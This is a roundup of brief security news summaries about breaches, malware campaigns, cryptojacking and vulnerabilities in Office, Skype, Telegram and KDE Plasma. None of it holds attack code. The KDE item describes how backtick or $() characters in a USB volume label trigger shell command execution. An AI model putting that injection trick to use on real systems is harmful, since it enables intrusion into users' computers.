Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.
The attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by Trustwave’s SpiderLabs. When opening attachments, there are no warnings or pop-ups alerting victims, researchers said. The attack uses malicious Word attachments.Read more
FedEx has exposed private information belonging to thousands of its customers after a legacy server was left open without a password. The discovery was made by security researchers at the Kromtech Security Center, which posted details of the exposure. The data, hosted on a password-less Amazon S3 storage server, was secured Tuesday after efforts were made to contact FedEx.
The server belonged to Bongo International, a company specializing in helping US retailers sell products online to consumers around the world by calculating shipping and duty calculations and currency conversions, among other things.Read more
A security flaw in Skype's updater process can allow an attacker to gain system-level privileges to a vulnerable computer. The bug, if exploited, can escalate a local unprivileged user to the full "system" level rights -- granting them access to every corner of the operating system.
But Microsoft, which owns the voice- and video-calling service, said it won't immediately fix the flaw, because the bug would require too much work. Stefan Kanthak found that the Skype update installer could be exploited with a DLL hijacking technique, which allows an attacker to trick an application into drawing malicious code instead of the correct library.Read more
In the past few weeks, the entire information security industry has grown very anxious about Meltdown and Spectre, two classes of exploits that can be used to manipulate vulnerabilities in the way many varieties of modern processors handle a performance-improving technique called speculative execution and extract hidden system data.
While numerous platforms have rushed to roll out patches, and Meltdown appears to be less of an issue than Spectre, it’s still unclear just how badly this situation could go. Unfortunately, researchers are already coming up with ways to exploit the vulnerabilities that go beyond the proof-of-concept stage.Read more
Western Union has confirmed one of its IT suppliers was hacked, and that customer information was exposed to miscreants.
A reader, who wished to remain anonymous, showed us a copy of a letter dated January 31 that he received from the money-transfer outfit. The missive admitted that a supposedly secure data storage company used by Western Union was compromised: a database full of the wire-transfer giant's customer records was vulnerable to plundering, and hackers were quick to oblige. In other words, it sounds as though a cloud-based or off-site backup storage provider was hacked. Now that system has been shut down, the cops alerted, and digital forensics teams are probing the network intrusion.Read more
Cyber thugs have been exploiting a zero-day flaw in the Telegram Messenger desktop app in order to mine for cryptocurrencies or to install a backdoor to remotely control victims’ computers. Kaspersky Lab discovered “in the wild” attacks on Telegram Messenger’s Windows desktop client back in October 2017.
The vulnerability in the popular Telegram app had been actively exploited since March 2017 to mine a variety of cryptocurrencies, such as Monero, Zcash, Fantomcoin and others. Yet the multi-purpose malware being delivered was capable of doing more than secretly use the computing power of victims’ machines to mine cryptocurrencies.Read more
Smartphone users are just as vulnerable to cryptocurrency mining hijacks as their PC counterparts, and sometimes on a dramatic scale.
Malwarebytes has detailed a "drive-by" mining campaign that redirected millions of Android users to a website that hijacked their phone processors for mining Monero. While the exact trigger wasn't clear, researchers believed that infected apps with malicious ads would steer people toward the pages. And it wasn't subtle -- the site would claim that you were showing "suspicious" web activity and tell you that it was mining until you entered a captcha code to make it stop.Read more
A recent Wired profile details the lengths at which Facebook employees are willing to go to ensure the company isn’t monitoring their communications.
The piece examines two years of Facebook’s struggles, detailing everything from its Trending Topics debacle, to the dismissal, acceptance, and regret surrounding the hijacking of the 2016 US Presidential Election by Russian operatives. From its beleaguered CEO, to the increasingly paranoid people manning its workstations, one thing is clear: there’s trouble in Menlo Park. What struck me immediately was the lengths some employees felt were necessary in obscuring private information, such as location data, from their employer.Read more
Linux users running KDE Plasma desktop environments need to apply patches to fix a bug that can lead to malicious code execution every time a user mounts a USB thumb drive on his computer.
The KDE Plasma team has released versions 5.8.9 and 5.12.0 to address the issue, tracked as CVE-2018-6791 and categorized as an "arbitrary command execution" vulnerability. According to a description of the bug, USB thumb drives that contain the characters `` or $() in the volume label will execute the text contained within these characters as shell commands. This means that an attacker can place malicious code in a USB thumb drive's name.Read more
Thousands of websites, including those belonging to NHS services, the Student Loans Company and several English councils, have been infected by malware that forces visitors’ computers to mine cryptocurrency while using the site.
Late on Sunday, the website of the UK’s data protection watchdog, the Information Commissioner’s Office, was taken down to deal with the issue after it was reportedly infected by the malware. The cryptojacking script was inserted into website codes through BrowseAloud, a popular plugin that helps blind and partially-sighted people access the web. More than 5,000 websites have been flooded by the malware.Read more